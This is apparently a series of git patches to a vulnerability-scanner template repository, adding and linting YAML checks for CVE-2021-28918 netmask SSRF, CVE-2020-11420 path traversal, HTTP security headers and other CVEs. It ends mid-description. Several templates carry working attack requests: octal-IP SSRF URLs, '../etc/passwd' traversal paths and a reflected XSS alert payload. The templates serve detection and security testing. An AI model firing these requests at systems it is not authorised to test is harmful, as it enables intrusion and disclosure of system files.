From 7dd0795296a2d76db67a7c7bcbf364b2be4ea937 Mon Sep 17 00:00:00 2001 From: John Jackson <39013067+johnjhacking@users.noreply.github.com> Date: Tue, 6 Jul 2021 00:50:43 -0600 Subject: [PATCH 01/35] Create Netmask SSRF Template The basic test to fuzz for the netmask SSRF vulnerability would be to use an Octal payload that resolves to the localhost. I limited it to 4 basic testing payloads as to not slow down the speed of a full-length CVE directories test. --- cves/2021/CVE-2021-28918.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2021/CVE-2021-28918.yaml diff --git a/cves/2021/CVE-2021-28918.yaml b/cves/2021/CVE-2021-28918.yaml new file mode 100644 index 0000000000..64643764d5 --- /dev/null +++ b/cves/2021/CVE-2021-28918.yaml @@ -0,0 +1,27 @@ +id: CVE-2021-28918 + +info: + name: npm Netmask SSRF + author: johnjhacking + severity: high + reference: https://github.com/sickcodes/security/blob/master/advisories/SICK-2021-011.md + description: Improper input validation of octal strings in netmask npm package v1.0.6 and below allows unauthenticated remote attackers to perform indeterminate SSRF, RFI, and LFI attacks on many of the dependent packages. A remote unauthenticated attacker can bypass packages relying on netmask to filter IPs and reach critical VPN or LAN hosts. + tags: cve,cve2021,npm,netmask,ssrf,rfi,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/?url=http://0177.0.0.1/server-status" + - "{{BaseURL}}/?uri=http://0177.0.0.1/server-status" + - "{{BaseURL}}/?dest=http://0177.0.0.1/server-status" + - "{{BaseURL}}/?redirect=http://0177.0.0.1/server-status" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "Apache Server Status" + - "Server Version" + part: body From 5d74f7e2e4b0c048366f2d4f4e8c8b2f57deff07 Mon Sep 17 00:00:00 2001 From: John Jackson <39013067+johnjhacking@users.noreply.github.com> Date: Tue, 6 Jul 2021 01:03:18 -0600 Subject: [PATCH 02/35] Update CVE-2021-28918.yaml Fixing trailing spaces. --- cves/2021/CVE-2021-28918.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-28918.yaml b/cves/2021/CVE-2021-28918.yaml index 64643764d5..314b84f1fb 100644 --- a/cves/2021/CVE-2021-28918.yaml +++ b/cves/2021/CVE-2021-28918.yaml @@ -23,5 +23,5 @@ requests: - type: word words: - "Apache Server Status" - - "Server Version" - part: body + - "Server Version" + part: body From ede7ca07d0352203c79b1c2e83a558427c5f2646 Mon Sep 17 00:00:00 2001 From: John Jackson <39013067+johnjhacking@users.noreply.github.com> Date: Tue, 6 Jul 2021 01:05:03 -0600 Subject: [PATCH 03/35] Fixing Trailing Spaces As stated. --- cves/2021/CVE-2021-28918.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-28918.yaml b/cves/2021/CVE-2021-28918.yaml index 314b84f1fb..bf38188859 100644 --- a/cves/2021/CVE-2021-28918.yaml +++ b/cves/2021/CVE-2021-28918.yaml @@ -21,7 +21,7 @@ requests: status: - 200 - type: word + part: body words: - "Apache Server Status" - "Server Version" - part: body From 7fb23a24b9107e5c30ac02d9cc66949082a8e694 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 6 Jul 2021 12:41:16 +0530 Subject: [PATCH 04/35] minor update --- cves/2021/CVE-2021-28918.yaml | 13 +++++++++---- 1 file changed, 9 insertions(+), 4 deletions(-) diff --git a/cves/2021/CVE-2021-28918.yaml b/cves/2021/CVE-2021-28918.yaml index bf38188859..debefe11c1 100644 --- a/cves/2021/CVE-2021-28918.yaml +++ b/cves/2021/CVE-2021-28918.yaml @@ -1,12 +1,14 @@ id: CVE-2021-28918 info: - name: npm Netmask SSRF + name: Netmask NPM Package <=v1.0.6 SSRF author: johnjhacking - severity: high - reference: https://github.com/sickcodes/security/blob/master/advisories/SICK-2021-011.md + severity: critical description: Improper input validation of octal strings in netmask npm package v1.0.6 and below allows unauthenticated remote attackers to perform indeterminate SSRF, RFI, and LFI attacks on many of the dependent packages. A remote unauthenticated attacker can bypass packages relying on netmask to filter IPs and reach critical VPN or LAN hosts. - tags: cve,cve2021,npm,netmask,ssrf,rfi,lfi + tags: cve,cve2021,npm,netmask,ssrf,lfi + reference: | + - https://github.com/sickcodes/security/blob/master/advisories/SICK-2021-011.md + - https://nvd.nist.gov/vuln/detail/CVE-2021-28918 requests: - method: GET @@ -15,13 +17,16 @@ requests: - "{{BaseURL}}/?uri=http://0177.0.0.1/server-status" - "{{BaseURL}}/?dest=http://0177.0.0.1/server-status" - "{{BaseURL}}/?redirect=http://0177.0.0.1/server-status" + matchers-condition: and matchers: - type: status status: - 200 + - type: word part: body words: - "Apache Server Status" - "Server Version" + condition: and \ No newline at end of file From 59199ad35e737e2935694792582ded3b9a845682 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 6 Jul 2021 12:45:50 +0530 Subject: [PATCH 05/35] Update CVE-2021-28918.yaml Removed version as multiple reference includes multiple versions. --- cves/2021/CVE-2021-28918.yaml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-28918.yaml b/cves/2021/CVE-2021-28918.yaml index debefe11c1..1f0f3c4456 100644 --- a/cves/2021/CVE-2021-28918.yaml +++ b/cves/2021/CVE-2021-28918.yaml @@ -1,14 +1,15 @@ id: CVE-2021-28918 info: - name: Netmask NPM Package <=v1.0.6 SSRF + name: Netmask NPM Package SSRF author: johnjhacking severity: critical - description: Improper input validation of octal strings in netmask npm package v1.0.6 and below allows unauthenticated remote attackers to perform indeterminate SSRF, RFI, and LFI attacks on many of the dependent packages. A remote unauthenticated attacker can bypass packages relying on netmask to filter IPs and reach critical VPN or LAN hosts. + description: Improper input validation of octal strings in netmask npm package allows unauthenticated remote attackers to perform indeterminate SSRF, RFI, and LFI attacks on many of the dependent packages. A remote unauthenticated attacker can bypass packages relying on netmask to filter IPs and reach critical VPN or LAN hosts. tags: cve,cve2021,npm,netmask,ssrf,lfi reference: | - https://github.com/sickcodes/security/blob/master/advisories/SICK-2021-011.md - https://nvd.nist.gov/vuln/detail/CVE-2021-28918 + - https://github.com/advisories/GHSA-pch5-whg9-qr2r requests: - method: GET From 71a27da89178b90d7ad593bb04e850f691dfb04d Mon Sep 17 00:00:00 2001 From: socketz Date: Wed, 28 Jul 2021 14:40:20 +0200 Subject: [PATCH 06/35] Added security headers templates --- .../http-present-security-headers.yaml | 116 ++++++++++++++++++ .../http-missing-security-headers.yaml | 113 +++++++++++++++++ 2 files changed, 229 insertions(+) create mode 100644 miscellaneous/http-present-security-headers.yaml create mode 100644 misconfiguration/http-missing-security-headers.yaml diff --git a/miscellaneous/http-present-security-headers.yaml b/miscellaneous/http-present-security-headers.yaml new file mode 100644 index 0000000000..66b98f6ea2 --- /dev/null +++ b/miscellaneous/http-present-security-headers.yaml @@ -0,0 +1,116 @@ +id: http-present-security-headers + +info: + name: HTTP Present Security Headers + author: socketz + severity: info + description: It searches present security headers, but obviously, could be so less generic and could be useless for Bug Bounty. + tags: config,headers + +requests: + - method: GET + path: + - "{{BaseURL}}" + redirects: true + max-redirects: 3 + extractors: + - type: regex + part: header + group: 0 + regex: + - "(?im)(Strict-Transport-Security):(.*)" + - type: regex + part: header + group: 0 + regex: + - "(?im)(X-Frame-Options):(.*)" + - type: regex + part: header + group: 0 + regex: + - "(?im)(X-Content-Type-Options):(.*)" + - type: regex + part: header + group: 0 + regex: + - "(?im)(Content-Security-Policy):(.*)" + - type: regex + part: header + group: 0 + regex: + - "(?im)(X-Permitted-Cross-Domain-Policies):(.*)" + - type: regex + part: header + group: 0 + regex: + - "(?im)(Referrer-Policy):(.*)" + - type: regex + part: header + group: 0 + regex: + - "(?im)(Clear-Site-Data):(.*)" + - type: regex + part: header + group: 0 + regex: + - "(?im)(Cross-Origin-Embedder-Policy):(.*)" + - type: regex + part: header + group: 0 + regex: + - "(?im)(Cross-Origin-Opener-Policy):(.*)" + - type: regex + part: header + group: 0 + regex: + - "(?im)(Cross-Origin-Resource-Policy):(.*)" + - type: regex + part: header + group: 0 + regex: + - "(?im)(X-XSS-Protection):(.*)" + - type: regex + part: header + group: 0 + regex: + - "(?im)(Public-Key-Pins):(.*)" + - type: regex + part: header + group: 0 + regex: + - "(?im)(Except-CT):(.*)" + - type: regex + part: header + group: 0 + regex: + - "(?im)(Feature-Policy):(.*)" + - type: regex + part: header + group: 0 + regex: + - "(?im)(Permissions-Policy):(.*)" + - type: regex + part: header + group: 0 + regex: + - "(?im)(Document-Policy):(.*)" + - type: regex + part: header + group: 0 + regex: + - "(?im)(X-XSRF-TOKEN):(.*)" + - type: regex + part: header + group: 0 + regex: + - "(?im)(X-CSRF-TOKEN):(.*)" + - type: regex + part: header + group: 0 + regex: + - "(?im)(X-CSRFToken):(.*)" + - type: regex + part: header + group: 0 + regex: + - "(?im)(Authorization):(.*)" diff --git a/misconfiguration/http-missing-security-headers.yaml b/misconfiguration/http-missing-security-headers.yaml new file mode 100644 index 0000000000..64db558b09 --- /dev/null +++ b/misconfiguration/http-missing-security-headers.yaml @@ -0,0 +1,113 @@ +id: http-missing-security-headers + +info: + name: HTTP Missing Security Headers + author: socketz + severity: info + description: It searches missing security headers, but obviously, could be so less generic and could be useless for Bug Bounty. + tags: config,headers,misconfiguration + +requests: + - method: GET + path: + - "{{BaseURL}}" + redirects: true + max-redirects: 3 + matchers-condition: or + matchers: + - type: word + name: "Strict-Transport-Security" + words: + - "Strict-Transport-Security" + part: header + negative: true + - type: word + name: "Content-Security-Policy" + words: + - "Content-Security-Policy" + part: header + negative: true + - type: word + name: "X-Frame-Options" + words: + - "X-Frame-Options" + part: header + negative: true + - type: word + name: "X-Content-Type-Options" + words: + - "X-Content-Type-Options" + part: header + negative: true + - type: word + name: "X-Permitted-Cross-Domain-Policies" + words: + - "X-Permitted-Cross-Domain-Policies" + part: header + negative: true + - type: word + name: "Referrer-Policy" + words: + - "Referrer-Policy" + part: header + negative: true + - type: word + name: "Clear-Site-Data" + words: + - "Clear-Site-Data" + part: header + negative: true + - type: word + name: "Cross-Origin-Embedder-Policy" + words: + - "Cross-Origin-Embedder-Policy" + part: header + negative: true + - type: word + name: "Cross-Origin-Opener-Policy" + words: + - "Cross-Origin-Opener-Policy" + part: header + negative: true + - type: word + name: "Cross-Origin-Resource-Policy" + words: + - "Cross-Origin-Resource-Policy" + part: header + negative: true + - type: word + name: "Access-Control-Allow-Origin" + words: + - "Access-Control-Allow-Origin" + part: header + negative: true + - type: word + name: "Access-Control-Allow-Credentials" + words: + - "Access-Control-Allow-Credentials" + part: header + negative: true + - type: word + name: "Access-Control-Expose-Headers" + words: + - "Access-Control-Expose-Headers" + part: header + negative: true + - type: word + name: "Access-Control-Max-Age" + words: + - "Access-Control-Max-Age" + part: header + negative: true + - type: word + name: "Access-Control-Allow-Methods" + words: + - "Access-Control-Allow-Methods" + part: header + negative: true + - type: word + name: "Access-Control-Allow-Headers" + words: + - "Access-Control-Allow-Headers" + part: header + negative: true From 7d6a6c137a22acf4a797bab040e5f25d4154c05e Mon Sep 17 00:00:00 2001 From: socketz Date: Tue, 24 Aug 2021 14:43:45 +0200 Subject: [PATCH 07/35] Added CVE-2020-11420 --- cves/2020/CVE-2020-11420.yaml | 35 +++++++++++++++++++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 cves/2020/CVE-2020-11420.yaml diff --git a/cves/2020/CVE-2020-11420.yaml b/cves/2020/CVE-2020-11420.yaml new file mode 100644 index 0000000000..e418ec32b9 --- /dev/null +++ b/cves/2020/CVE-2020-11420.yaml @@ -0,0 +1,35 @@ +id: CVE-2020-11420 + +info: + name: ABB UPS Adapter CS141 – Path traversal + author: socketz + severity: medium + description: | + A vulnerability exists in the UPS Adapter CS141 included in the versions 1.66 to 1.88. An attacker + with Admin or Engineer login credentials could exploit the vulnerability by manipulating variables that + reference files and by doing this achieve access to files and directories outside the web root folder. An + attacker may access arbitrary files and directories stored in the file system, but integrity of the files are + not jeopardized as attacker have read access rights only. This attack is commonly known as Path + Traversal or Directory Traversal. + This Path Traversal vulnerability could be exploited only when Alarm Logs have been processed, + and then you can exploit it, before that, you should wait. + reference: | + - https://library.e.abb.com/public/ee46f3ff5823400f991ebd9bd43a297e/2CMT2020-005913%20Security%20Advisory%20CS141.pdf + tags: cve,cve2020,iot,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/api/devices/ups/control?code=getAlarmData&alarmFileName=../etc/passwd" + headers: + - Referer: "{{BaseURL}}/lib/history.html?inputType=0&upsEvtHistCapa=1&upsProtocol=" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: regex + regex: + - "root:.*:0:0:" + part: body + From 65d9d8acb297ff994b207a71876e67305ebbfcef Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 24 Aug 2021 23:13:00 +0530 Subject: [PATCH 08/35] lint fix --- cves/2020/CVE-2020-11420.yaml | 17 ++++++++--------- 1 file changed, 8 insertions(+), 9 deletions(-) diff --git a/cves/2020/CVE-2020-11420.yaml b/cves/2020/CVE-2020-11420.yaml index e418ec32b9..123a068098 100644 --- a/cves/2020/CVE-2020-11420.yaml +++ b/cves/2020/CVE-2020-11420.yaml @@ -5,15 +5,15 @@ info: author: socketz severity: medium description: | - A vulnerability exists in the UPS Adapter CS141 included in the versions 1.66 to 1.88. An attacker - with Admin or Engineer login credentials could exploit the vulnerability by manipulating variables that - reference files and by doing this achieve access to files and directories outside the web root folder. An - attacker may access arbitrary files and directories stored in the file system, but integrity of the files are - not jeopardized as attacker have read access rights only. This attack is commonly known as Path + A vulnerability exists in the UPS Adapter CS141 included in the versions 1.66 to 1.88. An attacker + with Admin or Engineer login credentials could exploit the vulnerability by manipulating variables that + reference files and by doing this achieve access to files and directories outside the web root folder. An + attacker may access arbitrary files and directories stored in the file system, but integrity of the files are + not jeopardized as attacker have read access rights only. This attack is commonly known as Path Traversal or Directory Traversal. - This Path Traversal vulnerability could be exploited only when Alarm Logs have been processed, + This Path Traversal vulnerability could be exploited only when Alarm Logs have been processed, and then you can exploit it, before that, you should wait. - reference: | + reference: - https://library.e.abb.com/public/ee46f3ff5823400f991ebd9bd43a297e/2CMT2020-005913%20Security%20Advisory%20CS141.pdf tags: cve,cve2020,iot,lfi @@ -31,5 +31,4 @@ requests: - type: regex regex: - "root:.*:0:0:" - part: body - + part: body \ No newline at end of file From 3c95101f5a205906e29ec2437f5e25d1dcba5776 Mon Sep 17 00:00:00 2001 From: sandeep Date: Wed, 25 Aug 2021 00:31:27 +0530 Subject: [PATCH 09/35] Update CVE-2020-11420.yaml --- cves/2020/CVE-2020-11420.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-11420.yaml b/cves/2020/CVE-2020-11420.yaml index 123a068098..7a8affbb53 100644 --- a/cves/2020/CVE-2020-11420.yaml +++ b/cves/2020/CVE-2020-11420.yaml @@ -21,8 +21,10 @@ requests: - method: GET path: - "{{BaseURL}}/api/devices/ups/control?code=getAlarmData&alarmFileName=../etc/passwd" + headers: - - Referer: "{{BaseURL}}/lib/history.html?inputType=0&upsEvtHistCapa=1&upsProtocol=" + Referer: "{{BaseURL}}/lib/history.html?inputType=0&upsEvtHistCapa=1&upsProtocol=" + matchers-condition: and matchers: - type: status From d705fbd84bd910dd7d064da1746cb59c2741850b Mon Sep 17 00:00:00 2001 From: sandeep Date: Wed, 25 Aug 2021 00:33:54 +0530 Subject: [PATCH 10/35] Update CVE-2020-11420.yaml --- cves/2020/CVE-2020-11420.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-11420.yaml b/cves/2020/CVE-2020-11420.yaml index 7a8affbb53..be676408b1 100644 --- a/cves/2020/CVE-2020-11420.yaml +++ b/cves/2020/CVE-2020-11420.yaml @@ -23,7 +23,7 @@ requests: - "{{BaseURL}}/api/devices/ups/control?code=getAlarmData&alarmFileName=../etc/passwd" headers: - Referer: "{{BaseURL}}/lib/history.html?inputType=0&upsEvtHistCapa=1&upsProtocol=" + Referer: "{{BaseURL}}/lib/history.html?inputType=0&upsEvtHistCapa=1&upsProtocol=" matchers-condition: and matchers: From f290b9f60d7aa2dc8d752605b12d46f327f8f5e2 Mon Sep 17 00:00:00 2001 From: socketz Date: Wed, 25 Aug 2021 07:55:46 +0200 Subject: [PATCH 11/35] Deleted duplicate and in wrong directory --- cves/2020/CVE-2019-9618.yaml | 26 -------------------------- 1 file changed, 26 deletions(-) delete mode 100644 cves/2020/CVE-2019-9618.yaml diff --git a/cves/2020/CVE-2019-9618.yaml b/cves/2020/CVE-2019-9618.yaml deleted file mode 100644 index bc0a6e0e6d..0000000000 --- a/cves/2020/CVE-2019-9618.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: CVE-2019-9618 - -info: - name: GraceMedia Media Player 1.0 - Local File Inclusion - author: 0x_Akoko - severity: critical - reference: | - - https://www.exploit-db.com/exploits/46537 - - https://nvd.nist.gov/vuln/detail/CVE-2019-9618 - tags: cve,cve2019,wordpress,wp-plugin,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:[x*]:0:0" - - - type: status - status: - - 200 \ No newline at end of file From 0ef631dce102db77f5d848cc97eb3da0cbc77e7b Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 25 Aug 2021 16:52:35 +0530 Subject: [PATCH 12/35] Update http-missing-security-headers.yaml --- misconfiguration/http-missing-security-headers.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/misconfiguration/http-missing-security-headers.yaml b/misconfiguration/http-missing-security-headers.yaml index 64db558b09..350fcbe9db 100644 --- a/misconfiguration/http-missing-security-headers.yaml +++ b/misconfiguration/http-missing-security-headers.yaml @@ -5,7 +5,7 @@ info: author: socketz severity: info description: It searches missing security headers, but obviously, could be so less generic and could be useless for Bug Bounty. - tags: config,headers,misconfiguration + tags: config,headers,misconfiguration,generic requests: - method: GET From c766a8454d24d6512ee21c793205113212ba2ded Mon Sep 17 00:00:00 2001 From: socketz Date: Wed, 25 Aug 2021 14:09:42 +0200 Subject: [PATCH 13/35] Fixed yaml linting errors --- cves/2012/CVE-2012-1835.yaml | 10 +++++----- cves/2018/CVE-2018-10818.yaml | 2 +- cves/2018/CVE-2018-10822.yaml | 2 +- cves/2019/CVE-2019-12616.yaml | 11 +++++------ cves/2019/CVE-2019-9618.yaml | 3 ++- cves/2020/CVE-2020-7209.yaml | 11 +++++------ cves/2020/CVE-2020-8813.yaml | 2 +- cves/2020/CVE-2020-9496.yaml | 13 ++++++------- misconfiguration/java-melody-exposed.yaml | 2 +- vulnerabilities/other/mcafee-epo-rce.yaml | 2 +- .../other/netgear-router-auth-bypass.yaml | 2 +- 11 files changed, 29 insertions(+), 31 deletions(-) diff --git a/cves/2012/CVE-2012-1835.yaml b/cves/2012/CVE-2012-1835.yaml index 9bc5c08991..d92d5b7974 100644 --- a/cves/2012/CVE-2012-1835.yaml +++ b/cves/2012/CVE-2012-1835.yaml @@ -11,11 +11,11 @@ info: requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' -# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php?title[id]=%22%3E%3Cscript%3Ealert%28123%29;%3C/script%3E' -# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?args[before_widget]=%3Cscript%3Ealert%28123%29;%3C/script%3E' -# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&before_title=%3Cscript%3Ealert%28123%29;%3C/script%3E' -# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&after_title=%3Cscript%3Ealert%28123%29;%3C/script%3E' + - "{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php?title[id]=%22%3E%3Cscript%3Ealert%28123%29;%3C/script%3E' + # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?args[before_widget]=%3Cscript%3Ealert%28123%29;%3C/script%3E' + # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&before_title=%3Cscript%3Ealert%28123%29;%3C/script%3E' + # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&after_title=%3Cscript%3Ealert%28123%29;%3C/script%3E' matchers-condition: and matchers: diff --git a/cves/2018/CVE-2018-10818.yaml b/cves/2018/CVE-2018-10818.yaml index 2562be9725..da59c53d73 100644 --- a/cves/2018/CVE-2018-10818.yaml +++ b/cves/2018/CVE-2018-10818.yaml @@ -4,7 +4,7 @@ info: name: LG NAS Devices - Remote Code Execution (Unauthenticated) author: gy741 severity: critical - description: The vulnerability (CVE-2018-10818) is a pre-auth remote command injection vulnerability found in the majority of LG NAS devices. You cannot simply log in with any random username and password. However, there lies a command injection vulnerability in the “password” parameter. + description: The vulnerability (CVE-2018-10818) is a pre-auth remote command injection vulnerability found in the majority of LG NAS devices. You cannot simply log in with any random username and password. However, there lies a command injection vulnerability in the "password" parameter. reference: | - https://www.vpnmentor.com/blog/critical-vulnerability-found-majority-lg-nas-devices/ - https://medium.com/@0x616163/lg-n1a1-unauthenticated-remote-command-injection-cve-2018-14839-9d2cf760e247 diff --git a/cves/2018/CVE-2018-10822.yaml b/cves/2018/CVE-2018-10822.yaml index 17410d6679..7078f33dfc 100644 --- a/cves/2018/CVE-2018-10822.yaml +++ b/cves/2018/CVE-2018-10822.yaml @@ -4,7 +4,7 @@ info: name: D-Link Routers - Directory Traversal author: daffainfo severity: high - description: Directory traversal vulnerability in the web interface on D-Link routers DWR-116 through 1.06, DIR-140L through 1.02, DIR-640L through 1.02,DWR-512 through 2.02,DWR-712 through 2.02,DWR-912 through 2.02, DWR-921 through 2.02, DWR-111 through 1.01, and probably others with the same type of firmware allows remote attackers to read arbitrary files via a /.. or // after “GET /uir” in an HTTP request. + description: Directory traversal vulnerability in the web interface on D-Link routers DWR-116 through 1.06, DIR-140L through 1.02, DIR-640L through 1.02,DWR-512 through 2.02,DWR-712 through 2.02,DWR-912 through 2.02, DWR-921 through 2.02, DWR-111 through 1.01, and probably others with the same type of firmware allows remote attackers to read arbitrary files via a /.. or // after "GET /uir" in an HTTP request. reference: | - https://www.exploit-db.com/exploits/45678 - https://nvd.nist.gov/vuln/detail/CVE-2018-10822 diff --git a/cves/2019/CVE-2019-12616.yaml b/cves/2019/CVE-2019-12616.yaml index 1c3352b08d..00eb781972 100644 --- a/cves/2019/CVE-2019-12616.yaml +++ b/cves/2019/CVE-2019-12616.yaml @@ -6,10 +6,10 @@ info: description: A vulnerability was found that allows an attacker to trigger a CSRF attack against a phpMyAdmin user. The attacker can trick the user, for instance through a broken tag pointing at the victim's phpMyAdmin database, and the attacker can potentially deliver a payload (such as a specific INSERT or DELETE statement) through the victim. severity: medium tags: cve,cve2019,phpmyadmin,csrf - reference: | - - https://www.phpmyadmin.net/security/PMASA-2019-4/ - - https://www.exploit-db.com/exploits/46982 - - https://nvd.nist.gov/vuln/detail/CVE-2019-12616 + reference: + - https://www.phpmyadmin.net/security/PMASA-2019-4/ + - https://www.exploit-db.com/exploits/46982 + - https://nvd.nist.gov/vuln/detail/CVE-2019-12616 requests: - method: GET @@ -18,7 +18,6 @@ requests: matchers-condition: and matchers: - - type: word words: - "phpmyadmin.net" @@ -32,4 +31,4 @@ requests: - type: status status: - 200 - - 401 #password protected + - 401 # password protected diff --git a/cves/2019/CVE-2019-9618.yaml b/cves/2019/CVE-2019-9618.yaml index 5ed8f7c7f0..b74a1b1b13 100644 --- a/cves/2019/CVE-2019-9618.yaml +++ b/cves/2019/CVE-2019-9618.yaml @@ -8,6 +8,8 @@ info: reference: | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9618 - https://seclists.org/fulldisclosure/2019/Mar/26 + - https://www.exploit-db.com/exploits/46537 + - https://nvd.nist.gov/vuln/detail/CVE-2019-9618 tags: cve,cve2019,wordpress,wp-plugin,lfi requests: @@ -17,7 +19,6 @@ requests: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0" diff --git a/cves/2020/CVE-2020-7209.yaml b/cves/2020/CVE-2020-7209.yaml index 74841a4ce3..ab9f1ff023 100644 --- a/cves/2020/CVE-2020-7209.yaml +++ b/cves/2020/CVE-2020-7209.yaml @@ -11,12 +11,11 @@ info: http://packetstormsecurity.com/files/158025/LinuxKI-Toolset-6.01-Remote-Command-Execution.html https://github.com/HewlettPackard/LinuxKI/releases/tag/v6.0-2 - # This template exploits a vulnerability in LinuxKI Toolset <= 6.01 which allows remote code execution. - # The kivis.php pid parameter received from the user is sent to the shell_exec function, resulting in security vulnerability. - - # https://github.com/HewlettPackard/LinuxKI/commit/10bef483d92a85a13a59ca65a288818e92f80d78 - # vendor: https://www.hpe.com/us/en/home.html - # software: https://github.com/HewlettPackard/LinuxKI + # This template exploits a vulnerability in LinuxKI Toolset <= 6.01 which allows remote code execution. + # The kivis.php pid parameter received from the user is sent to the shell_exec function, resulting in security vulnerability. + # https://github.com/HewlettPackard/LinuxKI/commit/10bef483d92a85a13a59ca65a288818e92f80d78 + # vendor: https://www.hpe.com/us/en/home.html + # software: https://github.com/HewlettPackard/LinuxKI requests: - method: GET diff --git a/cves/2020/CVE-2020-8813.yaml b/cves/2020/CVE-2020-8813.yaml index 586fc0dfb9..823b53f29c 100644 --- a/cves/2020/CVE-2020-8813.yaml +++ b/cves/2020/CVE-2020-8813.yaml @@ -4,7 +4,7 @@ info: name: Cacti v1.2.8 - Unauthenticated Remote Code Execution author: gy741 severity: critical - description: This vulnerability could be exploited without authentication if Cacti is enabling “Guest Realtime Graphs” privilege, So in this case no need for the authentication part and you can just use the following code to exploit the vulnerability + description: This vulnerability could be exploited without authentication if Cacti is enabling "Guest Realtime Graphs" privilege, So in this case no need for the authentication part and you can just use the following code to exploit the vulnerability reference: | - https://shells.systems/cacti-v1-2-8-authenticated-remote-code-execution-cve-2020-8813/ tags: cve,cve2020,cacti,rce,oob diff --git a/cves/2020/CVE-2020-9496.yaml b/cves/2020/CVE-2020-9496.yaml index bf637b1ef7..e5f5e730c5 100644 --- a/cves/2020/CVE-2020-9496.yaml +++ b/cves/2020/CVE-2020-9496.yaml @@ -10,13 +10,12 @@ info: - http://packetstormsecurity.com/files/158887/Apache-OFBiz-XML-RPC-Java-Deserialization.html - http://packetstormsecurity.com/files/161769/Apache-OFBiz-XML-RPC-Java-Deserialization.html - - # This template detects a Java deserialization vulnerability in Apache - # OFBiz's unauthenticated XML-RPC endpoint /webtools/control/xmlrpc for - # versions prior to 17.12.04. - # -- - # References: - # - https://securitylab.github.com/advisories/GHSL-2020-069-apache_ofbiz + # This template detects a Java deserialization vulnerability in Apache + # OFBiz's unauthenticated XML-RPC endpoint /webtools/control/xmlrpc for + # versions prior to 17.12.04. + # -- + # References: + # - https://securitylab.github.com/advisories/GHSL-2020-069-apache_ofbiz requests: - raw: diff --git a/misconfiguration/java-melody-exposed.yaml b/misconfiguration/java-melody-exposed.yaml index 0139f7ec02..a2e2f0686d 100644 --- a/misconfiguration/java-melody-exposed.yaml +++ b/misconfiguration/java-melody-exposed.yaml @@ -4,7 +4,7 @@ info: name: JavaMelody Monitoring Exposed author: dhiyaneshDK,thomas_from_offensity severity: medium - description: JavaMelody is a tool used to monitor Java or Java EE applications in QA and production environments. JavaMelody was detected on this web application. One option in the dashboard is to “View http sessions”. This can be used by an attacker to steal a user’s session. + description: JavaMelody is a tool used to monitor Java or Java EE applications in QA and production environments. JavaMelody was detected on this web application. One option in the dashboard is to "View http sessions". This can be used by an attacker to steal a user’s session. reference: | - https://www.acunetix.com/vulnerabilities/web/javamelody-publicly-accessible/ - https://github.com/javamelody/javamelody/wiki/UserGuide#16-security diff --git a/vulnerabilities/other/mcafee-epo-rce.yaml b/vulnerabilities/other/mcafee-epo-rce.yaml index 8524264b95..8d8f248d89 100644 --- a/vulnerabilities/other/mcafee-epo-rce.yaml +++ b/vulnerabilities/other/mcafee-epo-rce.yaml @@ -8,7 +8,7 @@ info: A ZipSlip vulnerability in McAfee ePolicy Orchestrator (ePO) is a type of Path Traversal occurring when archives are unpacked if the names of the packed files are not properly sanitized. - An attacker can create archives with files containing “../” in their names, + An attacker can create archives with files containing "../" in their names, making it possible to upload arbitrary files to arbitrary directories or overwrite existing ones during archive extraction. diff --git a/vulnerabilities/other/netgear-router-auth-bypass.yaml b/vulnerabilities/other/netgear-router-auth-bypass.yaml index f2d94ceba8..c558f9bfde 100644 --- a/vulnerabilities/other/netgear-router-auth-bypass.yaml +++ b/vulnerabilities/other/netgear-router-auth-bypass.yaml @@ -4,7 +4,7 @@ info: name: Netgear DGN2200v1 Router Authentication Bypass author: gy741 severity: high - description: NETGEAR decided to use to check if a page has “.jpg”, “.gif” or “ess_” substrings, trying to match the entire URL. We can therefore access any page on the device, including those that require authentication, by appending a GET variable with the relevant substring (like “?.gif”). + description: NETGEAR decided to use to check if a page has ".jpg", ".gif" or "ess_" substrings, trying to match the entire URL. We can therefore access any page on the device, including those that require 